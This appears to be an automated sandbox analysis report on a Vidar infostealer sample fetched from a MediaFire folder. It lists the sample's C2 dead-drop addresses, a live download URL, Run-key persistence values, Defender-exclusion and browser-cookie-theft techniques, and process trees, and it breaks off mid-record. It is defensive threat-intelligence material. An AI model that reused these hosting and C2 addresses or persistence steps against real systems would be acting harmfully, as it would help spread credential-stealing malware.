vidar | hxxps://www[.]mediafire[.]com/folder/v4m4or3ymn9l9/Files

Analysis

max time kernel
124s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
24/02/2025, 10:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/folder/v4m4or3ymn9l9/Files

Score

10^/10

vidar credential_access defense_evasion discovery execution persistence stealer

Malware Config

Extracted

Family

vidar

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

Detect Vidar Stealer 5 IoCs

stealer

resource	yara_rule
behavioral1/files/0x0008000000023f3a-876.dat	family_vidar_v7
behavioral1/memory/3136-881-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2660-921-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5332-1054-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2124-1125-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1216	powershell.exe
3632	powershell.exe
4040	powershell.exe
5560	powershell.exe
5752	powershell.exe
5952	powershell.exe
6004	powershell.exe
1004	powershell.exe
4128	powershell.exe
5380	powershell.exe
5460	powershell.exe
5672	powershell.exe
5984	powershell.exe
2476	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 4 IoCs

flow	pid	Process
257	2344	S0FTWARE.exe
257	2344	S0FTWARE.exe
246	4648	S0FTWARE.exe
246	4648	S0FTWARE.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
6008	msedge.exe
5300	chrome.exe
1368	chrome.exe
5188	chrome.exe
5180	chrome.exe
5596	chrome.exe
5404	chrome.exe
5248	chrome.exe
2444	chrome.exe
5908	chrome.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation	S0FTWARE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation	beptiakdfg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation	S0FTWARE.exe

Executes dropped EXE 7 IoCs

pid	Process
4648	S0FTWARE.exe
2344	S0FTWARE.exe
3136	bitohopad.exe
4208	beptiakdfg.exe
2812	S0FTWARE.exe
2660	bitohopad.exe
3788	beptiakdfg.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\CWURE\\bitohopad.exe"	S0FTWARE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\CWURE\\beptiakdfg.exe"	S0FTWARE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\WJYZS\\bitohopad.exe"	S0FTWARE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "C:\\WJYZS\\beptiakdfg.exe"	S0FTWARE.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
246	raw.githubusercontent.com
257	raw.githubusercontent.com
293	raw.githubusercontent.com
309	raw.githubusercontent.com
245	raw.githubusercontent.com

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3744	powercfg.exe
6076	powercfg.exe
5768	powercfg.exe
5328	powercfg.exe

Launches sc.exe 13 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1408	sc.exe
2296	sc.exe
4408	sc.exe
1248	sc.exe
2132	sc.exe
5220	sc.exe
5756	sc.exe
5408	sc.exe
5788	sc.exe
1312	sc.exe
4428	sc.exe
5368	sc.exe
5792	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitohopad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	beptiakdfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitohopad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	beptiakdfg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1352	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5640	schtasks.exe
1864	schtasks.exe
4256	schtasks.exe
5884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
3216	msedge.exe
3216	msedge.exe
440	msedge.exe
440	msedge.exe
3364	identity_helper.exe
3364	identity_helper.exe
2596	msedge.exe
2596	msedge.exe
2476	powershell.exe
2476	powershell.exe
2476	powershell.exe
3744	msedge.exe
3744	msedge.exe
3744	msedge.exe
3744	msedge.exe
1004	powershell.exe
1004	powershell.exe
1004	powershell.exe
1216	powershell.exe
1216	powershell.exe
1216	powershell.exe
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
4040	powershell.exe
4040	powershell.exe
4040	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2180	OpenWith.exe
3632	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	4004	7zG.exe
Token: 35	4004	7zG.exe
Token: SeSecurityPrivilege	4004	7zG.exe
Token: SeSecurityPrivilege	4004	7zG.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
4344	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
2180	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe
3632	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 440 wrote to memory of 2132	440	msedge.exe	88
PID 440 wrote to memory of 2132	440	msedge.exe	88
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 2272	440	msedge.exe	90
PID 440 wrote to memory of 3216	440	msedge.exe	91
PID 440 wrote to memory of 3216	440	msedge.exe	91
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92
PID 440 wrote to memory of 1768	440	msedge.exe	92

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.mediafire.com/folder/v4m4or3ymn9l9/Files
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe7b546f8,0x7fffe7b54708,0x7fffe7b54718
  2⤵
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
  2⤵
  PID:2272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
  2⤵
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:1864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
  2⤵
  PID:3908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
  2⤵
  PID:3360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6944 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:2432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6884 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,5596622387080513060,4536576172560971770,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3744

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4460

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4344

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2180

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2172

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3632
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\S0FTWARE.rar
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1352

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\S0FTWARE\" -ad -an -ai#7zMap14051:78:7zEvent2452
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4004

C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe
"C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe"
1⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
